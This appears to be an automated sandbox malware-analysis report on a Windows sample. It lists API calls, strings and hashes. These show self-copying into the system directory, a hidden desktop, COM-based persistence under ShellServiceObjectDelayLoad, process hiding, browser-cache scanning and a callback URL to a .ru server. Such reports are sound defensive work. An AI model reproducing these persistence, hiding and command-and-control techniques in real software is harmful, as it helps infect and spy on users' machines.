                            • String ID: Y&-v
                            • API String ID: 2529654636-852306816
                            • Opcode ID: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction ID: 393fb1fac6dfb6d7043d4134058e676a256c67ba5a84656a07003a75d011006f
                            • Opcode Fuzzy Hash: 1a2ee31b6e64b1819939f0b424d9492dfa5bc2d8a36479f3b8c11624ee1f3d36
                            • Instruction Fuzzy Hash: A401A772B4461439F62165758C43F9E365D8B41B78F208136F711BB1C1D6F97E0142BD
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00404341
                            • GetThreadDesktop.USER32(00000000), ref: 00404347
                            • CreateDesktopA.USER32(blind_user,00000000,00000000,00000000,000000C7,00000000), ref: 00404376
                            • SetThreadDesktop.USER32 ref: 00404394
                            Strings
                            Similarity
                            • API ID: DesktopThread$CreateCurrent
                            • String ID: blind_user
                            • API String ID: 2384851093-487808672
                            • Opcode ID: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction ID: 282a6fb7077f79b337956a50597d570250b08ff90f4541f666399335e01d3b83
                            • Opcode Fuzzy Hash: f5dbc74db38e7769b0145d7bd92762358955ae931e1e69e9e23be6df9a4e239d
                            • Instruction Fuzzy Hash: 2C018471B442006FDB14B73E9C5276FA6D95BC0314F64403BA602F72D0E9B899018A5D
                            APIs
                            Strings
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            APIs
                            • memset.CRTDLL(?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403C8B
                            • memcpy.CRTDLL(?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CAE
                            • memcpy.CRTDLL(-0042AA50,?,00000006,?,-0042AA50,00000000,?,00000090,00000008,56CC39D8,-0042AA50,297D09F2,00000000), ref: 00403CBE
                            Strings
                            Similarity
                            • API ID: memcpy$memset
                            • String ID: MC
                            • API String ID: 438689982-3957011357
                            • Opcode ID: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction ID: 0fabd55d67194886af3b95eda558b9f651b3b184c5d0290ca09bafd6d30b71fa
                            • Opcode Fuzzy Hash: 17c6be56fc60e202b714f164ab6214ad707b693cbc1fda5e6d8626b4e57840bc
                            • Instruction Fuzzy Hash: F131B661F08198AFDB00DFBDC84169EBFFA9B4A210F1480B6E884F7381D5789F059765
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 004017CC
                            • CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                            • CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            Strings
                            • {9BA05972-F6A8-11CF-A442-00A0C90A8F39}, xrefs: 004017D5
                            Similarity
                            • API ID: CreateFromInitializeInstanceString
                            • String ID: {9BA05972-F6A8-11CF-A442-00A0C90A8F39}
                            • API String ID: 1245325315-1222218007
                            • Opcode ID: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction ID: 52c0c8d8f8a1b88d6522b4dea913535513547713cd70a2aa0dd21656c7656eb5
                            • Opcode Fuzzy Hash: 374fb238f9a8af98a0c272c884aa5e7a000c0b0753857630dac3c0af84d03f4f
                            • Instruction Fuzzy Hash: E1118673B102116FE710FEF5DC81BAB7AE89B00355F10483BE644F32D1E6B8A50286B9
                            APIs
                            Similarity
                            • API ID: signal$raise
                            • String ID:
                            • API String ID: 372037113-0
                            • Opcode ID: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction ID: baa5ba32779064c34a5af0890878b5a2dbb5619b613b0807c362cc876063d63b
                            • Opcode Fuzzy Hash: 2d1ef5de37ea69ebb4b8d4bb24db1da757c13c860f6842aad27d4f5ac914ae12
                            • Instruction Fuzzy Hash: 4541B475A01204DFC720DF18EC84B5677B4FB08350F44457AEE14AB3E1E734A965CBAA
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
                            • API String ID: 2176257816-3118753097
                            • Opcode ID: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction ID: 40b1eb1d73d9c04af9a72cf5af1a140bd4a75b2e1492408562adfdfa8721cd8f
                            • Opcode Fuzzy Hash: 3bea807363c46ff2eeabd7410228c447bcb65eafde6f1461acbb5ea9ba8cf64b
                            • Instruction Fuzzy Hash: F9110B72E0406867DB009A9A88815AFFBB69FC5310F1641F7EA04B73C1D27CAD0193A5
                            APIs
                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404255
                            • RegSetValueExA.ADVAPI32(?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?,4FB14922), ref: 00404273
                            • RegCloseKey.ADVAPI32(?,?,4FB14922,00000000,00000000,?,?,?,?,00000000,00000000,00000000,00020006,00000000,?,?), ref: 0040427F
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction ID: d96ef7c4080a9b633a5bca21bfcbc2c766a155132064e5ed691f16c3214ccdec
                            • Opcode Fuzzy Hash: 65498cc65565106dc5b66ff6a4b4d842dc0e77ec129b82882a45272a282f6444
                            • Instruction Fuzzy Hash: B801F772B10109BBCF11AEB5CC02F9EBEBA9F84340F240476B704F61E0D675D9116718
                            APIs
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042EF
                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,00000000,00020019,?), ref: 004042FB
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.1985346265.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000007.00000002.1985309091.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985391617.000000000042A000.00000004.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985423351.000000000042E000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985446853.000000000042F000.00000002.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985470156.0000000000436000.00000020.00000001.01000000.0000000A.sdmp
                            • Associated: 00000007.00000002.1985499870.0000000000438000.00000002.00000001.01000000.0000000A.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_400000_Oceoll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Odekfoij,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Odekfoij,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Odekfoij,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Odekfoij,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Odekfoij$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-3115103061
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmp
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
